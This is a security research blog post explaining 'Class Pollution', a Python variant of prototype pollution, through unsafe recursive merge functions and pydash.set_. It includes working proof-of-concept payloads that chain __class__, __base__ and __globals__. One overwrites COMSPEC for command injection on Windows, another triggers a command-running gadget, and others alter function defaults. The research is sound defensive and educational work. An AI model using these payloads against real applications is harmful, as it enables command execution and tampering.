Abdulraheem Khaled (Abdulrah33m)
> TL;DR
The main objective of this research is to show that a variant of Prototype Pollution can exist in other programming languages, including class-based ones, by demonstrating Class Pollution in Python.
Warning: This is a topic that I'm still working on, and the post will be updated frequently with new results. While I've found examples of the vulnerable merge function implemented in various open-source projects, I still haven't found a full exploit with an impact other than crashing the application.
> Background
Prototype Pollution might be one of the coolest vulnerabilities to dig into as a researcher. Researchers have done a great job exploring this topic, but there's always more. While reading about Prototype Pollution, I noticed that all resources discuss it in JavaScript, whether in client-side code or in NodeJS server-side applications, and honestly, there is a good explanation for that. Prototype Pollution is a language-specific vulnerability: as the name suggests, it should affect only prototype-based programming languages. JavaScript is not the only prototype-based language, but it is one of the most popular ones, which is why all the resources focus on Prototype Pollution in JS. It might be possible to see Prototype Pollution in other prototype-based languages; however, we cannot say that a programming language is vulnerable just because it uses prototypes.
As a Python fanboy (yes, I admit it), I believe that you can build anything in Python, even vulnerabilities (as if Prototype Pollution in JavaScript were not complicated enough!).
> No Prototypes, No Issue
Let's start by explaining what a prototype means and why it's used. JavaScript uses a prototype-based inheritance model. Although the name might sound weird, the idea is similar to normal class-based inheritance, with some differences (it's just that JavaScript wants to make our lives harder, I mean easier).
Prototypes are the mechanism by which JavaScript objects inherit features from one another. When you try to access a property of an object: if the property can't be found in the object itself, the prototype is searched for the property. If the property still can't be found, then the prototype's prototype is searched, and so on until either the property is found, or the end of the chain is reached, in which case undefined is returned. https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Objects/Object_prototypes
Now that we know what a prototype is, let's learn a little more about Prototype Pollution. There are a lot of awesome resources that explain Prototype Pollution in JavaScript in much more depth; I suggest checking them out before you continue reading.
Prototype pollution is a vulnerability where an attacker is able to modify Object.prototype. Because nearly all objects in JavaScript are instances of Object, a typical object inherits properties (including methods) from Object.prototype. Changing Object.prototype can result in a wide range of issues, sometimes even resulting in remote code execution. https://www.acunetix.com/vulnerabilities/web/prototype-pollution/
I like to think of Prototype Pollution as a fancy form of object injection (where we inject into an existing object rather than injecting a new object): instead of setting an attribute on that single object only, we pollute the parent prototype, and the change is reflected on all other objects, including ones that would otherwise be inaccessible. While it has a lot in common with insecure deserialization, try not to confuse the two.
The flexibility offered by some scripting languages such as Python makes the differences between prototype-based and class-based inheritance barely noticeable in practice. Therefore, we might be able to replicate the idea of Prototype Pollution in other programming languages, even class-based ones. I'll refer to this vulnerability as Class Pollution in this article, since we don't actually have prototypes in Python. Imagine saying we found an SQL injection in a static web app that doesn't even have a database!
Dunder methods (also known as magic methods) are special methods that Python invokes implicitly on objects during various operations, such as __str__(), __eq__(), and __call__().
They specify what objects of a class should do when used in various statements and with various operators. Many dunder methods have default implementations (for example, those provided by object), which a new class inherits implicitly; however, developers can override these methods and provide their own implementations when defining new classes.
There are also other special attributes on every object in Python, such as __class__, __doc__, etc. Each of these attributes serves a specific purpose.
In Python, we don't have prototypes, but we have special attributes.
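To make both ideas concrete, here is a minimal sketch using a hypothetical Point class (not part of the original examples): overriding dunder methods changes how the object behaves with built-in operations such as str() and ==, while special attributes like __class__ and __doc__ are available without us defining them.

```python
class Point:
    """A 2D point (hypothetical example class)."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    # Called implicitly by str() and print()
    def __str__(self):
        return f"Point({self.x}, {self.y})"

    # Called implicitly by the == operator
    def __eq__(self, other):
        return isinstance(other, Point) and (self.x, self.y) == (other.x, other.y)


p = Point(1, 2)
print(p)                       # Point(1, 2)
print(p == Point(1, 2))        # True

# Special attributes that exist without us defining them
print(p.__class__.__name__)    # Point
print(p.__doc__)               # A 2D point (hypothetical example class).
```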
In Python, it's possible to modify objects of mutable types to define or overwrite their attributes and methods at runtime. Let's see it in action.
class Employee: pass # Creating an empty class
emp = Employee()
another_emp = Employee()
Employee.name = 'No one' # Defining an attribute for the Employee class
print(emp.name)
emp.name = 'Employee 1' # Defining an attribute for an object (overriding the class attribute)
print(emp.name)
emp.say_hi = lambda: 'Hi there!' # Defining a method for an object
print(emp.say_hi())
Employee.say_bye = lambda s: 'Bye!' # Defining a method for the Employee class
print(emp.say_bye())
Employee.say_bye = lambda s: 'Bye bye!' # Overwriting a method of the Employee class
print(another_emp.say_bye())
#> No one
#> Employee 1
#> Hi there!
#> Bye!
#> Bye bye!
In the code shown above, we created two instances of the empty Employee class and then defined new attributes and methods, some on a single object and some on the class itself. Attributes and methods defined on a specific object are accessible by that instance only (instance attributes), while those defined on a class can be accessed by all objects of that class (class attributes, somewhat like static members).
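The sketch below, reusing the empty Employee class from the example above, shows where each attribute actually lives: instance attributes are stored in the object's own __dict__, class attributes in the class's __dict__, and attribute lookup falls back from the instance to its class, loosely comparable to JavaScript walking up the prototype chain.

```python
class Employee: pass  # Creating an empty class

emp = Employee()
Employee.name = 'No one'      # stored in Employee.__dict__ (shared by all instances)
emp.name = 'Employee 1'       # stored in emp.__dict__ (this instance only)

print(vars(emp))                  # {'name': 'Employee 1'}
print(Employee.__dict__['name'])  # No one

# Deleting the instance attribute makes the lookup fall back to the class again
del emp.name
print(emp.name)                   # No one
```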
This feature of Python got me wondering whether we could apply the same concept as Prototype Pollution, but this time in Python, by leveraging the special attributes that all objects have.
From an attacker's perspective, we are more interested in attributes that we can override or overwrite than in magic methods. Our input will always be treated as data (str, int, etc.), not as code to be evaluated, so overwriting a magic method will only crash the application when that method is invoked, because data such as strings can't be called. For example, calling the __str__() method after setting its value to a string throws an error like TypeError: 'str' object is not callable.
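The sketch below reproduces that crash with the empty Employee class used throughout this article. It covers two cases: overwriting __str__ on an instance only breaks explicit calls such as emp.__str__(), while overwriting it on the class also breaks implicit invocations such as str(emp), because Python looks dunder methods up on the type.

```python
class Employee: pass  # Creating an empty class

emp = Employee()
errors = []

# Overwriting a dunder method on the instance with attacker-style data (a string)
emp.__str__ = 'Polluted'
try:
    emp.__str__()              # explicit call of the now-string attribute
except TypeError as e:
    errors.append(str(e))

# Overwriting it on the class breaks implicit invocations such as str() and print()
Employee.__str__ = 'Polluted'
try:
    str(emp)                   # str() looks up __str__ on the class, not the instance
except TypeError as e:
    errors.append(str(e))

print(errors)
```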
Now let's try to overwrite one of the most important attributes of any object in Python: __class__, which points to the class that the object is an instance of.
class Employee: pass # Creating an empty class
emp = Employee()
emp.__class__ = 'Polluted'
#> Traceback (most recent call last):
#> File "<stdin>", line 1, in <module>
#> TypeError: __class__ must be set to a class, not 'str' object
In our example, emp.__class__ points to the Employee class because emp is an instance of that class. You can think of <instance>.__class__ in Python as <instance>.constructor in JavaScript.
In the snippet above, we tried to set the __class__ attribute of the emp object to a string to see what happens.
Even though we got an error, the error looks promising! It shows that __class__ must be set to another class and not to a string. This means that Python was trying to overwrite the special attribute with what we provided; the only issue is the data type of the value we are trying to assign to __class__.
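As a quick check of that reading, the sketch below assigns a class instead of a string. Other is a hypothetical class introduced only for this illustration; for ordinary user-defined classes with compatible layouts, Python accepts the assignment and the object starts behaving as an instance of the new class.

```python
class Employee: pass  # Creating an empty class

class Other:          # Hypothetical class used only for this demo
    def greet(self):
        return 'Hi from Other'

emp = Employee()
emp.__class__ = Other   # Accepted: the value is a class, not a str

print(isinstance(emp, Other))  # True
print(emp.greet())             # Hi from Other
```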
Let's try to set another attribute that accepts strings. The __qualname__ attribute, reachable through __class__, might be good for testing: __class__.__qualname__ is an attribute that contains the qualified name of the class.
class Employee: pass # Creating an empty class
emp = Employee()
emp.__class__.__qualname__ = 'Polluted'
print(emp)
print(Employee)
#> <__main__.Polluted object at 0x0000024765C48250>
#> <class '__main__.Polluted'>
We were able to pollute the class and set its __qualname__ attribute to an arbitrary string. Keep in mind that when we set __class__.__qualname__ on an object, it is the __qualname__ attribute of that object's class (Employee in our case) that changes. This is because __class__ is a reference to the object's class, so any modification made through it is actually applied to the class itself, as mentioned before.
To see how the vulnerability might appear in real Python applications, I've ported the recursive merge function that is abused to pollute objects' prototypes in the classic JavaScript Prototype Pollution.
The recursive merge function can come in various forms and implementations and might be used to accomplish different tasks, such as merging two or more objects or using JSON to set an object's attributes. The key functionality to look for is a function that takes untrusted input we control and uses it to set attributes of an object recursively. Finding such a function is enough to exploit the vulnerability. However, if we are lucky enough to find a merge function that not only recursively traverses and sets attributes of an object (__getattr__ and __setattr__) but also recursively traverses and sets items (__getitem__ and __setitem__), it becomes much easier to find great gadgets to leverage.
On the other hand, a merge function that uses our input to recursively set items of a dictionary via __getitem__ and __setitem__ only would not be exploitable, as we wouldn't be able to access special attributes such as __class__, __base__, etc.
In JavaScript, this distinction may go unnoticed because an object is essentially a dictionary, so both <object>[<property>] and <object>.<property> can be used to access its properties.
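A minimal sketch of such an items-only merge (dict_merge is a hypothetical function, not taken from any specific project): because it only ever uses item access, a "__class__" key in the input is stored as an ordinary dictionary key instead of being resolved to the special attribute.

```python
def dict_merge(src, dst):
    # Hypothetical recursive merge that only uses __getitem__/__setitem__
    for k, v in src.items():
        if isinstance(v, dict) and isinstance(dst.get(k), dict):
            dict_merge(v, dst[k])
        else:
            dst[k] = v

config = {'name': 'app'}
dict_merge({'__class__': {'__qualname__': 'Polluted'}}, config)

print(config)                      # {'name': 'app', '__class__': {'__qualname__': 'Polluted'}}
print(type(config).__qualname__)   # dict (the real class is untouched)
```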
class Employee: pass # Creating an empty class
def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
emp_info = {
    "name":"Ahemd",
    "age": 23,
    "manager":{
        "name":"Sarah"
    }
}
emp = Employee()
print(vars(emp))
merge(emp_info, emp)
print(vars(emp))
print(f'Name: {emp.name}, age: {emp.age}, manager name: {emp.manager.get("name")}')
#> {}
#> {'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
#> Name: Ahemd, age: 23, manager name: Sarah
In the code above, we have a merge function that takes an instance emp of the empty Employee class and the employee's info emp_info, a dictionary (similar to JSON) that we control as attackers. The merge function reads keys and values from the emp_info dictionary and sets them on the given object emp. In the end, what was previously an empty instance has the attributes and items that we provided in the dictionary.
Let's try to overwrite some special attributes now! We will update emp_info to try to set the __qualname__ attribute of the Employee class via emp.__class__.__qualname__, as we did before, but using the merge function this time.
class Employee: pass # Creating an empty class
def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
emp_info = {
    "name":"Ahemd",
    "age": 23,
    "manager":{
        "name":"Sarah"
    },
    "__class__":{
        "__qualname__":"Polluted"
    }
}
emp = Employee()
merge(emp_info, emp)
print(vars(emp))
print(emp)
print(emp.__class__.__qualname__)
print(Employee)
print(Employee.__qualname__)
#> {'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
#> <__main__.Polluted object at 0x000001F80B20F5D0>
#> Polluted
#> <class '__main__.Polluted'>
#> Polluted
We were able to pollute the Employee class because an instance of that class was passed to the merge function, but what if we want to pollute the parent class as well? This is where __base__ comes into play. __base__ is another attribute of a class that points to the nearest parent class it inherits from, so in an inheritance chain, __base__ points to the class's direct parent.
In the example shown below, hr_emp.__class__ points to the HR class, while hr_emp.__class__.__base__ points to HR's parent class, Employee, which is the class we will be polluting.
class Employee: pass # Creating an empty class
class HR(Employee): pass # Class inherits from Employee class
def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
emp_info = {
    "__class__":{
        "__base__":{
            "__qualname__":"Polluted"
        }
    }
}
hr_emp = HR()
merge(emp_info, hr_emp)
print(HR)
print(Employee)
#> <class '__main__.HR'>
#> <class '__main__.Polluted'>
The same approach can be followed to pollute any parent class in the inheritance chain (as long as it isn't one of the immutable built-in types) by chaining __base__ attributes together, such as __base__.__base__, __base__.__base__.__base__, and so on.
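The sketch below uses the same Employee, HR, Recruiter hierarchy that appears in this article's examples and walks __base__ step by step from an instance; __mro__ lists the same chain in one go. The helper name nth_base is hypothetical.

```python
class Employee: pass
class HR(Employee): pass
class Recruiter(HR): pass

def nth_base(obj, n):
    # Hypothetical helper: follow __class__ once, then __base__ n times
    cls = obj.__class__
    for _ in range(n):
        cls = cls.__base__
    return cls

r = Recruiter()
print(nth_base(r, 1).__name__)  # HR
print(nth_base(r, 2).__name__)  # Employee
print(nth_base(r, 3).__name__)  # object (immutable, cannot be polluted)
print([c.__name__ for c in Recruiter.__mro__])  # ['Recruiter', 'HR', 'Employee', 'object']
```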
Now you might be wondering why we don't pollute the well-known object class, the parent class of all classes at the end of every inheritance chain, since modifying any of its attributes would be reflected on all other objects.
If we try to set an attribute of the object class, for example object.__qualname__ = 'Polluted', we get the error message TypeError: cannot set '__qualname__' attribute of immutable type 'object'.
This is due to a limitation in Python: it doesn't allow us to modify immutable built-in types such as object, str, int, dict, etc.
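A small sketch reproducing this limitation. The exact error message may vary between Python versions (the one quoted above comes from recent releases), so the code only relies on a TypeError being raised; a user-defined class, by contrast, accepts the same assignment.

```python
blocked = []
for builtin_type in (object, str, int, dict):
    try:
        builtin_type.__qualname__ = 'Polluted'
    except TypeError as e:
        blocked.append(builtin_type.__name__)
        print(e)

print(blocked)  # ['object', 'str', 'int', 'dict']

class Employee: pass   # A user-defined class is mutable
Employee.__qualname__ = 'Polluted'
print(Employee.__qualname__)  # Polluted
```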
Because of this limitation, exploiting Class Pollution in Python requires that the unsafe merge and the attribute we want to set to trigger a gadget belong to the same class, or at least that their classes share a parent class (other than object) at some point in the inheritance chain (not really, wait for it).
from os import popen
class Employee: pass # Creating an empty class
class HR(Employee): pass # Class inherits from Employee class
class Recruiter(HR): pass # Class inherits from HR class
class SystemAdmin(Employee): # Class inherits from Employee class
    def execute_command(self):
        command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
        return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
emp_info = {
    "__class__":{
        "__base__":{
            "__base__":{
                "custom_command": "whoami"
            }
        }
    }
}
recruiter_emp = Recruiter()
system_admin_emp = SystemAdmin()
print(system_admin_emp.execute_command())
merge(emp_info, recruiter_emp)
print(system_admin_emp.execute_command())
#> [!] Executing: "echo Hello there", output: "Hello there"
#> [!] Executing: "whoami", output: "abdulrah33m"
In the previous example, even though the unsafe merge happens on an object of the Recruiter class and the gadget we are interested in (the execute_command method, which allows command execution) is in the SystemAdmin class, we were able to take control of it by setting the custom_command attribute on the Employee class.
This works because SystemAdmin and Recruiter both inherit from the Employee class at some point. By leveraging the unsafe merge, we set the custom_command attribute of the Employee class, so when an instance of SystemAdmin looks up that attribute, it finds it, inherited from the parent class Employee.
It doesn't matter whether the instance that triggers the gadget (system_admin_emp in our example) was created before or after the merge operation, since we're polluting the class itself, and the change is reflected on existing and new instances of that class alike. The only requirement is that the gadget is invoked after the class has been polluted.
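To illustrate, the sketch below sets the attribute directly on the parent class (standing in for what the unsafe merge effectively does) and reads it from SystemAdmin instances created before and after that assignment.

```python
class Employee: pass
class SystemAdmin(Employee): pass

before = SystemAdmin()                 # created before the pollution
Employee.custom_command = 'whoami'     # stand-in for the effect of the unsafe merge
after = SystemAdmin()                  # created after the pollution

print(before.custom_command, after.custom_command)  # whoami whoami
print('custom_command' in vars(before))             # False: it lives on Employee
```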
That's interesting, but hold on, there is even more. So far, we have only polluted attributes of the instance passed to the merge function and of its mutable parent classes, but this is not everything.
In this variation of Prototype Pollution, we may not be able to pollute the built-in object class, but we can pollute any other mutable class we want if we can find a chain of attributes that leads to it. Moreover, we're not limited to classes and their attributes: by leveraging the __globals__ attribute, we can even overwrite variables in the code.
According to the Python documentation, __globals__ is "A reference to the dictionary that holds the function's global variables (the global namespace of the module in which the function was defined)." In other words, __globals__ is a dictionary that gives us access to a function's global scope, which lets us reach defined variables, imported modules, etc. To access items of the __globals__ attribute, the merge function must support __getitem__, as previously mentioned.
The __globals__ attribute is accessible from any user-defined method of the instance we control, such as __init__. We don't have to use __init__ specifically; any method defined in the instance's class will do. However, __init__ is the method we are most likely to find, since it's the class constructor. We cannot use built-in methods inherited from the object class, such as __str__, unless they were overridden. Keep in mind that <instance>.__init__, <instance>.__class__.__init__ and <class>.__init__ all lead to the same class constructor (the first one is a bound method wrapping the same function).
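A quick check of both points, using a hypothetical Plain class that defines no constructor: on an instance, __init__ is a bound method wrapping the same function stored on the class (attribute lookups such as __globals__ are forwarded to that function), while a constructor or __str__ inherited from object is a built-in wrapper with no __globals__ at all.

```python
class User:
    def __init__(self):      # user-defined constructor: a plain Python function
        pass

class Plain:                 # hypothetical class with no __init__ of its own
    pass

u = User()
# The bound method and the class attribute wrap the same function object
print(u.__init__.__func__ is User.__init__)                  # True
print(u.__class__.__init__ is User.__init__)                 # True
print(u.__init__.__globals__ is User.__init__.__globals__)   # True

# Built-in methods inherited from object expose no __globals__
print(hasattr(Plain.__init__, '__globals__'))                # False
print(hasattr(u.__str__, '__globals__'))                     # False
```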
So the rule of thumb is: if we can find a chain of attributes/items (depending on what the merge function supports) from the object we control to any attribute or variable we want to control, we will be able to overwrite it.
This gives us much more flexibility and greatly increases the attack surface when looking for gadgets to leverage. We will show some examples of gadgets that you may be able to leverage, depending on the application.
def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
class User:
    def __init__(self):
        pass
class NotAccessibleClass: pass
not_accessible_variable = 'Hello'
merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Polluted variable','NotAccessibleClass':{'__qualname__':'PollutedClass'}}}}}, User())
print(not_accessible_variable)
print(NotAccessibleClass)
#> Polluted variable
#> <class '__main__.PollutedClass'>
We leveraged the special attribute __globals__ to access and set an attribute of the NotAccessibleClass class and to modify the global variable not_accessible_variable. Neither NotAccessibleClass nor not_accessible_variable would be reachable without __globals__, since the class isn't a parent class of the instance we control and the variable isn't an attribute of the class we control. However, since we can find a chain of attributes/items leading to them from the instance we have, we were able to pollute both NotAccessibleClass and not_accessible_variable.
> Real Examples of the Merge Function
Let's look at some actual implementations of the merge function.
While working on this topic, I wanted to show real cases of libraries or applications that are vulnerable to Class Pollution to prove the concept. So, I started searching for Python libraries that provide functionality where a recursive merge might be needed and used.
Lodash is one of the JavaScript libraries in which Prototype Pollution was discovered and reported more than once. Now allow me to introduce you to the Python port of Lodash: Pydash. Pydash's set_ and set_with functions are examples of recursive merge functions that we can leverage to pollute attributes.
The best part is that both set_ and set_with let us move between object attributes and dictionary items and set them, which is exactly what we could ask for. Given an object, the path of the attribute/item we want to set, and the value to set it to, each of these functions sets the specified attribute or item on the given instance.
In all the previous examples, Pydash's set_ and set_with functions could be used instead of the merge function we wrote, and the code would still be exploitable in the same way. The only difference is that Pydash functions use dot notation such as ((<attribute>|<item>).)*(<attribute>|<item>) to access attributes and items instead of the JSON format.
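To illustrate what such a path-based setter does, here is a minimal, hypothetical set_path helper that walks a dot-separated path, using item access on mappings and attribute access on everything else. It is a sketch of the behavior described above under that assumption, not Pydash's actual implementation, which handles many more cases.

```python
from collections.abc import MutableMapping

def set_path(obj, path, value):
    # Hypothetical helper: walk every path segment except the last one
    *parents, last = path.split('.')
    for key in parents:
        obj = obj[key] if isinstance(obj, MutableMapping) else getattr(obj, key)
    # Set the final segment as an item on mappings, as an attribute otherwise
    if isinstance(obj, MutableMapping):
        obj[last] = value
    else:
        setattr(obj, last, value)

class User:
    def __init__(self):
        pass

class NotAccessibleClass: pass
not_accessible_variable = 'Hello'

set_path(User(), '__class__.__init__.__globals__.not_accessible_variable', 'Polluted variable')
set_path(User(), '__class__.__init__.__globals__.NotAccessibleClass.__qualname__', 'PollutedClass')
print(not_accessible_variable)          # Polluted variable
print(NotAccessibleClass.__qualname__)  # PollutedClass
```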
import pydash
class User:
    def __init__(self):
        pass
class NotAccessibleClass: pass
not_accessible_variable = 'Hello'
pydash.set_(User(), '__class__.__init__.__globals__.not_accessible_variable','Polluted variable')
print(not_accessible_variable)
pydash.set_(User(), '__class__.__init__.__globals__.NotAccessibleClass.__qualname__','PollutedClass')
print(NotAccessibleClass)
#> Polluted variable
#> <class '__main__.PollutedClass'>
> Some Cool Gadgets
As always with Prototype Pollution, the impact depends on the application and the available gadgets. Here too, the impact ranges from causing DoS by crashing the application to ultimately achieving command execution; it all depends on the application itself. While we can't list every gadget you may find, in this section I'll show some of the cool gadgets that you might come across while exploiting this vulnerability.
subprocess.Popen on Windows
In this example, we can set any attribute or item under the newly created instance of the Employee class by providing a JSON-formatted payload, as previously shown. After the merge operation, the script executes the hard-coded whoami command. Our objective here is to hijack the execution of Popen to run arbitrary commands instead of whoami.
Take some time and try to pop calc.exe on your own before you continue reading. Note that this exploit works on Windows only.
import subprocess, json
class Employee:
    def __init__(self):
        pass
def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
emp_info = json.loads('{"name": "employee"}') # attacker-controlled value
merge(emp_info, Employee())
subprocess.Popen('whoami', shell=True)
Our main objective here is to find a chain of attributes and items that somehow lets us control the command executed by Popen (which is a class, not a function).
Let's look into the subprocess module source code to see how Popen works on Windows.
if shell:
    startupinfo.dwFlags |= _winapi.STARTF_USESHOWWINDOW
    startupinfo.wShowWindow = _winapi.SW_HIDE
    comspec = os.environ.get("COMSPEC", "cmd.exe")
    args = '{} /c "{}"'.format (comspec, args)
We notice an if statement that checks whether the shell argument was set to True. If it was, Popen tries to get the path of cmd.exe from the user's environment variables and executes the provided command using C:\WINDOWS\system32\cmd.exe /c <command>. If the COMSPEC environment variable is not defined, it sets the comspec variable in the code (not the environment variable) to cmd.exe. So if we control the value of COMSPEC in os.environ, we will be able to inject arbitrary commands.
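The effect can be reproduced without Windows by evaluating the two quoted lines against a plain dictionary that stands in for os.environ; build_shell_args and fake_environ are hypothetical names, and nothing is executed. With COMSPEC polluted to cmd /c calc, the resulting command line starts calc, and the original command is only left over as trailing arguments.

```python
def build_shell_args(args, environ):
    # Hypothetical helper mirroring the two quoted lines from subprocess's Windows path
    comspec = environ.get("COMSPEC", "cmd.exe")
    return '{} /c "{}"'.format(comspec, args)

fake_environ = {}   # hypothetical stand-in for os.environ
print(build_shell_args('whoami', fake_environ))   # cmd.exe /c "whoami"

fake_environ['COMSPEC'] = 'cmd /c calc'           # the polluted value
print(build_shell_args('whoami', fake_environ))   # cmd /c calc /c "whoami"
```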
The chain that we need to use to overwrite the COMSPEC environment variable can be explained as follows:
- We start by accessing any method of the Employee instance other than the built-in methods, to be able to access the __globals__ attribute; this is __init__ in our case.
- Using __globals__, we can access the subprocess module that is imported in our script.
- In the first lines of the subprocess module, we can see that it imports the os module, which we need to reach environ. If the os module were already imported in our script, we could access it directly using __init__.__globals__.os without going through subprocess.
- Finally, after getting to the os module, we can overwrite the value of COMSPEC inside environ to perform command injection.
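The same chain can be followed read-only, which is a harmless way to confirm each hop. This sketch reuses the Employee class from the example and, like the payload, starts from __init__ on the instance: that works because a bound method forwards the __globals__ lookup to its underlying function. It only reads the objects and does not modify os.environ.

```python
import subprocess, os

class Employee:
    def __init__(self):
        pass

emp = Employee()
g = emp.__init__.__globals__        # hop 1: a user-defined method exposes __globals__
sp = g['subprocess']                # hop 2: the subprocess module imported by the script
os_module = sp.os                   # hop 3: subprocess imports os itself
environ = os_module.environ         # hop 4: the mapping that would hold COMSPEC

print(sp is subprocess, os_module is os, environ is os.environ)  # True True True
```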
import subprocess, json
class Employee:
    def __init__(self):
        pass
def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
emp_info = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
merge(emp_info, Employee())
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
Overwriting a Function's __kwdefaults__
__kwdefaults__ is a special attribute of functions; according to the Python documentation, it is a "mapping of any default values for keyword-only parameters". Polluting this attribute allows us to control the default values of a function's keyword-only parameters, which are the parameters that come after * or *args.
import json
def merge(src, dst):
    # Recursive merge function
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
class Employee:
    def __init__(self):
        pass
def print_message(*, message='Hello there'):
    print(message)
print(print_message.__kwdefaults__)
print_message()
emp_info = json.loads('{"__class__":{"__init__":{"__globals__":{"print_message":{"__kwdefaults__":{"message":"Polluted default value"}}}}}}') # attacker-controlled value
merge(emp_info, Employee())
print(print_message.__kwdefaults__)
print_message()
#> {'message': 'Hello there'}
#> Hello there
#> {'message': 'Polluted default value'}
#> Polluted default value
While __kwdefaults__ stores default values for keyword-only parameters, the __defaults__ attribute is a tuple that stores default values for positional-or-keyword parameters. It would be great if we could pollute a function's __defaults__ attribute; however, this won't be possible in scenarios where the untrusted input we control is parsed as JSON, because JSON has no tuple type.
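A short sketch of why, using a hypothetical greet function: JSON arrays are decoded as Python lists, and assigning a list to __defaults__ raises a TypeError; only a real tuple, which the standard JSON decoder does not produce for arrays, is accepted.

```python
import json

def greet(message='Hello there'):     # hypothetical function with a positional default
    return message

print(greet.__defaults__)             # ('Hello there',)

payload = json.loads('["Polluted"]')  # JSON arrays decode to lists
print(type(payload).__name__)         # list

rejected = False
try:
    greet.__defaults__ = payload      # a list is not accepted
except TypeError as e:
    rejected = True
    print(e)

greet.__defaults__ = tuple(payload)   # only a real tuple works
print(greet())                        # Polluted
```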
There is More
Since it's impossible to list every way to leverage this vulnerability, I'll mention a few more examples and leave them for the readers to explore further.
- Overwriting a Flask web app's secret key, which is used for session signing.
- Path hijacking via os.environ.
> Updates
Since this is a topic that I'm still working on, I'm going to update this blog during my journey to answer the questions we all have.
- January 4, 2023: the article was published.
> References
- https://portswigger.net/daily-swig/prototype-pollution-the-dangerous-and-underrated-vulnerability-impacting-javascript-applications
- https://developer.mozilla.org/en-US/docs/Web/JavaScript/Inheritance_and_the_prototype_chain
- https://alistapart.com/article/prototypal-object-oriented-programming-using-javascript/
- https://github.com/HoLyVieR/prototype-pollution-nsec18